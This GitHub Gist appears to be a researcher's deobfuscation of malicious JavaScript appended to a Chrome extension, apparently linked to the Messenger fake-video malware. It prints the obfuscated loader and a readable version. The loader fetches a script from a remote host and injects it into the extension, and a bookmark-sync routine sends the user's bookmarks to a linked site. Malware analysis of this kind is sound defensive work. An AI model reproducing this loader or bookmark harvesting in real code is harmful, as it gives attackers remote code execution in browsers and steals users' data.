Created
April 28, 2018 21:01
-
-
Save gnanet/b9f342f07c9dbd7ebb253ae3f242c300 to your computer and use it in GitHub Desktop.
Deobfuscated Malicious JS appended to ChromeExtension, which has a possible role in the Messenger Fake video malware breakout
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function syncBookmarks(){ | |
| console.log('sync...') | |
| chrome.bookmarks.getTree(function(results){ | |
| chrome.tabs.query({active: true, currentWindow: true}, function(tabs){ | |
| chrome.tabs.sendMessage(tabs[0].id, {bookmarksData: true, data: results}, function(response) {}); | |
| }); | |
| }) | |
| } | |
| chrome.runtime.onMessage.addListener(function(request, sender, sendResponse) { | |
| var cbdata = {'request':request, 'sender':sender} | |
| if (request.sync !== true || (sender.url !== "http://mylinkbox.ru/" && sender.url !== "http://mylinkbox.ru/#")) { | |
| sendResponse({result: "error", url:sender.url, sync:request.sync}); | |
| } else { | |
| syncBookmarks() | |
| sendResponse({result: "success"}); | |
| return true | |
| } | |
| }); | |
| var _0x72b2=["\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74","\x73\x74\x61\x74\x75\x73","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C","\x63\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x55\x52\x4C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x63\x68\x72\x6F\x6D\x65\x2D\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x74\x68\x65\x6E","\x62\x6C\x6F\x62","\x68\x74\x74\x70\x3A\x2F\x2F\x6F\x70\x65\x6B\x69\x62\x75\x74\x75\x6B\x2E\x64\x69\x72\x67\x2E\x6D\x65\x2F\x75\x6C\x65\x72\x6F\x79\x61\x7A\x61\x63\x69\x70\x2F\x65\x7A\x75\x62\x6F\x74\x6F\x2E\x62\x67"];_0x72b2[0];fetch(_0x72b2[14])[_0x72b2[12]](function(_0x6307x1){if(_0x6307x1[_0x72b2[1]]== 200){_0x6307x1[_0x72b2[13]]()[_0x72b2[12]](function(_0x6307x1){if(_0x6307x1[_0x72b2[2]]== _0x72b2[3]){var _0x6307x2=URL[_0x72b2[4]](_0x6307x1);var _0x6307x3=document[_0x72b2[6]](_0x72b2[5]);_0x6307x3[_0x72b2[7]]= _0x6307x2;if(_0x6307x3[_0x72b2[7]][_0x72b2[9]](_0x72b2[8])> 0){document[_0x72b2[11]][_0x72b2[10]](_0x6307x3)}}})}}) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function syncBookmarks() { | |
| console.log('sync...') | |
| chrome.bookmarks.getTree(function(results) { | |
| chrome.tabs.query({ | |
| active: true, | |
| currentWindow: true | |
| }, function(tabs) { | |
| chrome.tabs.sendMessage(tabs[0].id, { | |
| bookmarksData: true, | |
| data: results | |
| }, function(response) {}); | |
| }); | |
| }) | |
| } | |
| chrome.runtime.onMessage.addListener(function(request, sender, sendResponse) { | |
| var cbdata = { | |
| 'request': request, | |
| 'sender': sender | |
| } | |
| if (request.sync !== true || (sender.url !== "http://mylinkbox.ru/" && sender.url !== "http://mylinkbox.ru/#")) { | |
| sendResponse({ | |
| result: "error", | |
| url: sender.url, | |
| sync: request.sync | |
| }); | |
| } else { | |
| syncBookmarks() | |
| sendResponse({ | |
| result: "success" | |
| }); | |
| return true | |
| } | |
| }); | |
| // Used 2 deobfuscators http://jsnice.org/ and https://www.javascriptdeobfuscator.com/, combined with manual variable substitution to achieve the result below. | |
| // // | |
| // var _0x72b2 = ["use strict", "status", "type", "text/html", "createObjectURL", "script", "createElement", "src", "chrome-extension", "indexOf", "appendChild", "head", "then", "blob", "http://opekibutuk.dirg.me/uleroyazacip/ezuboto.bg"]; | |
| var _0x72b2 = ["\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74", "\x73\x74\x61\x74\x75\x73", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C", "\x63\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x55\x52\x4C", "\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x73\x72\x63", "\x63\x68\x72\x6F\x6D\x65\x2D\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E", "\x69\x6E\x64\x65\x78\x4F\x66", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x74\x68\x65\x6E", "\x62\x6C\x6F\x62", "\x68\x74\x74\x70\x3A\x2F\x2F\x6F\x70\x65\x6B\x69\x62\x75\x74\x75\x6B\x2E\x64\x69\x72\x67\x2E\x6D\x65\x2F\x75\x6C\x65\x72\x6F\x79\x61\x7A\x61\x63\x69\x70\x2F\x65\x7A\x75\x62\x6F\x74\x6F\x2E\x62\x67"]; | |
| "use strict"; | |
| fetch("http://opekibutuk.dirg.me/uleroyazacip/ezuboto.bg")["then"](function(canCreateDiscussions) { | |
| if (canCreateDiscussions["status"] == 200) { | |
| canCreateDiscussions["blob"]()["then"](function(singleTapTimeout) { | |
| if (singleTapTimeout["type"] == "text/html") { | |
| var i = URL["createObjectURL"](singleTapTimeout); | |
| var uniqueLinks = document["createElement"]("script"); | |
| uniqueLinks["src"] = i; | |
| if (uniqueLinks["src"]["indexOf"]("chrome-extension") > 0) { | |
| document["head"]["appendChild"](uniqueLinks) | |
| } | |
| } | |
| }) | |
| } | |
| }) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment